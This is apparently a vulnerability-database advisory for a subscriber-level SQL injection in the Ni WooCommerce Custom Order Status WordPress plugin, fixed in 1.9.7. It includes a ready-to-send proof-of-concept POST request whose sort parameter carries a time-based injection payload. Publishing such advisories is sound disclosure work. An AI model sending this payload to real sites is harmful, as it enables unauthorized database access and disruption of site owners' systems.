WordPress Plugin Vulnerabilities
Ni WooCommerce Custom Order Status < 1.9.7 - Subscriber+ SQL Injection
Description
The get_query() function of the plugin, used by the niwoocos_ajax AJAX action, available to all authenticated users, does not properly sanitise the sort parameter before using it in a SQL statement, leading to an SQL injection, exploitable by any authenticated users, such as subscriber
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: [Any authenticated user] Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 115 action=niwoocos_ajax&sub_action=order_status_report&call=get_report&sort=procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(10000000,sha1(1))),0x20),1)
Affects Plugins
Fixed in version 1.9.7
References
Classification
Miscellaneous
Original Researcher
JrXnm
Submitter
JrXnm
Submitter website
Verified
Yes
Timeline
Publicly Published
2021-11-22 (about 7 months ago)
Added
2021-11-22 (about 7 months ago)
Last Updated
2022-04-11 (about 2 months ago)